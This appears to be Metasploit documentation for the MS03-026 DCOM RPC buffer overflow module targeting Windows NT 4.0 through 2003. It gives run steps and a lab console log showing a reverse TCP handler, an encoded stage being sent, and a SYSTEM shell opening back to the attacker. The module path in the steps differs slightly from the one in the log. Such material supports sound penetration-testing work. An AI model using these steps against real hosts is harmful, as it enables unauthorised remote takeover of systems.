## Vulnerable Application

This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
was originally found by the Last Stage of Delirium research group and has been
widely exploited ever since. This module can exploit the English versions of
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/windows/smb/ms03_026_dcom`
1. Do: `set rhosts <rhosts>`
1. Do: `run`
1. You should get a `SYSTEM` shell.

## Options

## Scenarios

### Windows 2000 Server SP4 (English)

```
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.164:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 172.16.191.164:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.191.164[135] ...
[*] 172.16.191.164:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.164
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.164:1027 ) at 2021-11-27 23:52:35 -0500


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
-----
          

C:\WINNT\system32>
```
